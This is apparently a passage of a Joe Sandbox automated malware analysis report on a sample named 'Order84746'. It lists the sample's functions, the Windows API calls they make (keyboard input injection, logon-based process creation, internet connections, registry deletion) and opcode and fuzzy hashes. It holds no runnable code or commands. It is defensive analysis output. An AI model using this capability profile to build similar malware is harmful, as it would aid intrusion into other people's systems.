                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: RegDeleteKeyExW$advapi32.dll
                          • API String ID: 2574300362-4033151799
                          • Opcode ID: 68c035230cdee328c2b77589a69c76cb5056621f334bdda0da8015a5d8ee94df
                          • Instruction ID: 9d1f32637caf418771ae275607a0194b517f1edb97b3783ef9b4bfb225aa69d1
                          • Opcode Fuzzy Hash: 68c035230cdee328c2b77589a69c76cb5056621f334bdda0da8015a5d8ee94df
                          • Instruction Fuzzy Hash: D4D0A7B0918712AFCB205FB5E848E03BAFCAB0231EB21841DE895E2150D6F0C4808E10
                          Function 00919B30 Relevance: 6.3, APIs: 4, Instructions: 306COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8546f09329af9c7591f679994f0d238f7932b2002f950df86143830547c7dc76
                          • Instruction ID: 979e6633808876ea70f123a4a230b10bee7652c8050777e99550eea23e415d6a
                          • Opcode Fuzzy Hash: 8546f09329af9c7591f679994f0d238f7932b2002f950df86143830547c7dc76
                          • Instruction Fuzzy Hash: 6CC14D75A0021AEFCB14DF94C894AEEB7B9FF88704F104598E946EB291D730DE81DB90
                          Function 0093AA84 Relevance: 6.3, APIs: 4, Instructions: 268COMMON
                          Download Yara Rule
                          APIs
                          • CoInitialize.OLE32(00000000), ref: 0093AAB4
                          • CoUninitialize.COMBASE ref: 0093AABF
                            • Part of subcall function 00920213: CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 0092027B
                          • VariantInit.OLEAUT32(?), ref: 0093AACA
                          • VariantClear.OLEAUT32(?), ref: 0093AD9D
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                          • String ID:
                          • API String ID: 780911581-0
                          • Opcode ID: 7db7c9e84e3e22b826280a0eb9e32262c9daafc13033bf3c70051fd80e5b2e52
                          • Instruction ID: 411e3e5373e410ecffd68d9d26560471c7edafbe1706fc7bd3c2f09812f0a424
                          • Opcode Fuzzy Hash: 7db7c9e84e3e22b826280a0eb9e32262c9daafc13033bf3c70051fd80e5b2e52
                          • Instruction Fuzzy Hash: 3CA128752047019FCB10DF29C491B1AB7E9FF89710F144849FA969B3A2CB74ED44CB86
                          Function 009191CC Relevance: 6.2, APIs: 4, Instructions: 201memoryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Variant$AllocClearCopyInitString
                          • String ID:
                          • API String ID: 2808897238-0
                          • Opcode ID: fa11ecadd8fd9accfa89e64e7ecde28ed1bfca05bb84e48dc48079cd8dffe7a6
                          • Instruction ID: 62d18525929e413e9a1a2ff2a65cf6e8bd6d6647bb36c0db496ae146523992cf
                          • Opcode Fuzzy Hash: fa11ecadd8fd9accfa89e64e7ecde28ed1bfca05bb84e48dc48079cd8dffe7a6
                          • Instruction Fuzzy Hash: 19519430B0430A9BDB249F7AD8A17AEB3E9EF45310F20881FE566C72D1DB7498C19716
                          Function 0094C4D7 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                          Download Yara Rule
                          APIs
                          • GetWindowRect.USER32(00FF6670,?), ref: 0094C544
                          • ScreenToClient.USER32(?,00000002), ref: 0094C574
                          • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 0094C5DA
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Window$ClientMoveRectScreen
                          • String ID:
                          • API String ID: 3880355969-0
                          • Opcode ID: 65561649fde9c7420feeb7318c689662c66ae4fcc3e070ebf490a7682640059f
                          • Instruction ID: 827e03d13e33cf64d76be920f925dcd89b6f11df919c51986f96544b413c4c21
                          • Opcode Fuzzy Hash: 65561649fde9c7420feeb7318c689662c66ae4fcc3e070ebf490a7682640059f
                          • Instruction Fuzzy Hash: 3F514AB5A05209AFCF20DF68C880EAE7BB9EF55360F108659F965DB290D770ED41CB90
                          Function 0091C410 Relevance: 6.1, APIs: 4, Instructions: 130windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0091C462
                          • __itow.LIBCMT ref: 0091C49C
                            • Part of subcall function 0091C6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0091C753
                          • SendMessageW.USER32(?,0000110A,00000001,?), ref: 0091C505
                          • __itow.LIBCMT ref: 0091C55A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: MessageSend$__itow
                          • String ID:
                          • API String ID: 3379773720-0
                          • Opcode ID: e891a03f4906c77a852b31d5f1660212838928cfd5ece9b8efa7d40b803ef24a
                          • Instruction ID: 33c5ec746b20c9c7c29c4e34353d7e8805912c0e97caff266ffe324cd5dd6039
                          • Opcode Fuzzy Hash: e891a03f4906c77a852b31d5f1660212838928cfd5ece9b8efa7d40b803ef24a
                          • Instruction Fuzzy Hash: 6641A471B4424DAFDF11DF58C851BEE7BB9EF49704F000019FA05E7291DB749A858BA2
                          Function 0092390C Relevance: 6.1, APIs: 4, Instructions: 112keyboardwindowCOMMON
                          Download Yara Rule
                          APIs
                          • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00923966
                          • SetKeyboardState.USER32(00000080,?,00000001), ref: 00923982
                          • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 009239EF
                          • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00923A4D
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: KeyboardState$InputMessagePostSend
                          • String ID:
                          • API String ID: 432972143-0
                          • Opcode ID: d6cfb4ff623d11c3c9183506daf5c14c9695dd9113eed26c1f9892130234d4f4
                          • Instruction ID: 1eba9accf0ba48da2a0e31e58635064f755aab2abbaa4db330e58e091dd0fe69
                          • Opcode Fuzzy Hash: d6cfb4ff623d11c3c9183506daf5c14c9695dd9113eed26c1f9892130234d4f4
                          • Instruction Fuzzy Hash: 03412974E04228EAEF209B64E8057FDBBB99B56310F04815AF4C1521C9C7BD8EC5E765
                          Function 0092E698 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                          Download Yara Rule
                          APIs
                          • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0092E742
                          • GetLastError.KERNEL32(?,00000000), ref: 0092E768
                          • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0092E78D
                          • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0092E7B9
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: CreateHardLink$DeleteErrorFileLast
                          • String ID:
                          • API String ID: 3321077145-0
                          • Opcode ID: 6ec06461f4902e588c81f49415b14d1287c9632ee0cdb17d65710ca6f309a681
                          • Instruction ID: 05fc83ca8db79184939f9d0e65e18e53d2c39d175fe001dec863f7d5032db5af
                          • Opcode Fuzzy Hash: 6ec06461f4902e588c81f49415b14d1287c9632ee0cdb17d65710ca6f309a681
                          • Instruction Fuzzy Hash: 75413D39600650DFCF11EF1AC58495DBBE5FF59710B098498E956AB3A2CB74FD00CB92
                          Function 0094B544 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                          Download Yara Rule
                          APIs
                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0094B5D1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: InvalidateRect
                          • String ID:
                          • API String ID: 634782764-0
                          • Opcode ID: 39f8cee51d674095dfb909c8a55db5b02435da6946b3c917b5afde6a5cd75f7d
                          • Instruction ID: 423aab39cb498a667d8615c0205bb42a9ad10af18af9a9f30206558c20b3ff5e
                          • Opcode Fuzzy Hash: 39f8cee51d674095dfb909c8a55db5b02435da6946b3c917b5afde6a5cd75f7d
                          • Instruction Fuzzy Hash: 0C313134611208BFEF349F18CC88FECB768EB06320F648506FA11D62E1C734E940AB92
                          Function 0094D7DE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON
                          Download Yara Rule
                          APIs
                          • ClientToScreen.USER32(?,?), ref: 0094D807
                          • GetWindowRect.USER32(?,?), ref: 0094D87D
                          • PtInRect.USER32(?,?,0094ED5A), ref: 0094D88D
                          • MessageBeep.USER32(00000000), ref: 0094D8FE
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Rect$BeepClientMessageScreenWindow
                          • String ID:
                          • API String ID: 1352109105-0
                          • Opcode ID: 44949746f9887cebd4098f0f22f9fc7786120551838d5f8d115dea2b7d513ba0
                          • Instruction ID: 0b2ad69e510be99ba6360552581824074ea424b7675d75e3fc8bd4c01d8a2c16
                          • Opcode Fuzzy Hash: 44949746f9887cebd4098f0f22f9fc7786120551838d5f8d115dea2b7d513ba0
                          • Instruction Fuzzy Hash: 84419A78A06219DFCB11DF58C884FA97BB9FF4A754F1881A9E415CB360D330E941DB80
                          Function 00923A61 Relevance: 6.1, APIs: 4, Instructions: 104keyboardwindowCOMMON
                          Download Yara Rule
                          APIs
                          • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00923AB8
                          • SetKeyboardState.USER32(00000080,?,00008000), ref: 00923AD4
                          • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00923B34
                          • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00923B92
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: KeyboardState$InputMessagePostSend
                          • String ID:
                          • API String ID: 432972143-0
                          • Opcode ID: 92824cd45d786752cc0d6b56e3d6e72d3a5781eba2e69c73208ff30b33b19c43
                          • Instruction ID: 705c3eaa0bb149d607eb1217d0622d161b02d2d46ebc923eb548b5277c13e452
                          • Opcode Fuzzy Hash: 92824cd45d786752cc0d6b56e3d6e72d3a5781eba2e69c73208ff30b33b19c43
                          • Instruction Fuzzy Hash: 75314630A04278AEEF208F64E819BFE7BB99B55311F04811AE482932D9C77C8F85D761
                          Function 00914004 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00914038
                          • __isleadbyte_l.LIBCMT ref: 00914066
                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00914094
                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 009140CA
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                          • String ID:
                          • API String ID: 3058430110-0
                          • Opcode ID: ce8e9a314a1b60ff53a83b07153d39a200075b65dd8e339f8d70ce09411b4fb5
                          • Instruction ID: d3fdfd1b3291dcb29b3b0cd4695b73bf3b8e603417df1836f4beb98e9b6e2ee6
                          • Opcode Fuzzy Hash: ce8e9a314a1b60ff53a83b07153d39a200075b65dd8e339f8d70ce09411b4fb5
                          • Instruction Fuzzy Hash: B731B03170420AAFDB219F76CC44BEA7BA9BF4D310F158428E6659B1A0E731D8D1DB90
                          Function 00947CA5 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                          Download Yara Rule
                          APIs
                          • GetForegroundWindow.USER32 ref: 00947CB9
                            • Part of subcall function 00925F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00925F6F
                            • Part of subcall function 00925F55: GetCurrentThreadId.KERNEL32 ref: 00925F76
                            • Part of subcall function 00925F55: AttachThreadInput.USER32(00000000,?,0092781F), ref: 00925F7D
                          • GetCaretPos.USER32(?), ref: 00947CCA
                          • ClientToScreen.USER32(00000000,?), ref: 00947D03
                          • GetForegroundWindow.USER32 ref: 00947D09
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                          • String ID:
                          • API String ID: 2759813231-0
                          • Opcode ID: e6e82c3570dab6ee9a951ef69735e5ea7e75dd03e0cc8cbeaaa1a45ce2a3e6e0
                          • Instruction ID: f9b2bc2987fc6db8267c55154324ff175674c0c3c43fc6fe98d482ca18b70988
                          • Opcode Fuzzy Hash: e6e82c3570dab6ee9a951ef69735e5ea7e75dd03e0cc8cbeaaa1a45ce2a3e6e0
                          • Instruction Fuzzy Hash: 76313071D00108AFCB00EFB9D8419EFFBF9EF94310B11846AE915E3251DA309E058BA1
                          Function 0093431C Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                          Download Yara Rule
                          APIs
                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00934358
                            • Part of subcall function 009343E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00934401
                            • Part of subcall function 009343E2: InternetCloseHandle.WININET(00000000), ref: 0093449E
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Internet$CloseConnectHandleOpen
                          • String ID:
                          • API String ID: 1463438336-0
                          • Opcode ID: db7ccbd90fab7b04128c7a4d18431397e156837cd5deacffc4cb213f18e879d9
                          • Instruction ID: d71d310e9dde22b8ffd58322e2f4adb98a5e4e3408923cc92640a0f38f219d57
                          • Opcode Fuzzy Hash: db7ccbd90fab7b04128c7a4d18431397e156837cd5deacffc4cb213f18e879d9
                          • Instruction Fuzzy Hash: 8A21D175645601BBEB159F609D00FBBB7ADFF88710F01441EFA1597650DBB1A820AF90
                          Function 0091AF64 Relevance: 6.1, APIs: 4, Instructions: 73processCOMMON
                          Download Yara Rule
                          APIs
                          • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 0091AFAE
                          • OpenProcessToken.ADVAPI32(00000000), ref: 0091AFB5
                          • CloseHandle.KERNEL32(00000004), ref: 0091AFCF
                          • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0091AFFE
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Process$CloseCreateCurrentHandleLogonOpenTokenWith
                          • String ID:
                          • API String ID: 2621361867-0
                          • Opcode ID: 7638df644d1710e987d809f330b481bdc991f487e88695df1a51f568d4bb8378
                          • Instruction ID: 1855bddcd351d6d7d771cd09d1add97efd47c8576c5884c0ef1346f13463831e
                          • Opcode Fuzzy Hash: 7638df644d1710e987d809f330b481bdc991f487e88695df1a51f568d4bb8378
                          • Instruction Fuzzy Hash: B9214FB260620DABDF018FA5DD09FEE7BA9AF44304F044019F901A2261C3759D55EB61
                          Function 00948A37 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                          Download Yara Rule
                          APIs
                          • GetWindowLongW.USER32(?,000000EC), ref: 00948AA6
                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00948AC0
                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00948ACE
                          • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00948ADC
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
